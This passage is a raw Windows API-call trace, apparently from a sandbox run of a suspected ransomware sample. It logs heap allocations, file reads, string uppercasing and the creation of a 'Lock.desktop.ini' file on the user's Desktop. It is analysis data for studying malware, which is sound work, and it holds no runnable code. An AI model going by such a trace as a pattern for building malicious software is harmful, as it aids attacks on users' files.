hHeap=0x2af0000) returned 1 [0090.018] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0090.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75858 | out: hHeap=0x2af0000) returned 1 [0090.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0090.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0090.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0090.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0090.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0090.019] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0090.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f60 [0090.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.086] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0090.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0090.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0090.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.087] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0090.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0090.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0090.088] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x39cf020 [0090.090] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0090.090] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x11a, lpOverlapped=0x0) returned 1 [0090.091] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0090.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0090.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0090.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.091] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11a) returned 0x2a74958 [0090.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x39cf020 | out: hHeap=0x2af0000) returned 1 [0090.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0090.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0090.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0090.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.093] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11a) returned 0x2a74a80 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.094] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11a) returned 0x2a74958 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.094] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.094] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0090.094] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0090.094] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0090.095] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0090.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0090.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11a) returned 0x2a74958 [0090.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0090.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0090.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0090.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96a0 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.095] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0090.095] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11a) returned 0x29f7698 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0090.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0090.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.096] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0090.096] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.096] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0090.097] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0090.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0090.097] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0090.097] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0090.097] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0090.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0090.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0090.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0090.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0090.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.098] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0090.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0090.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0090.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 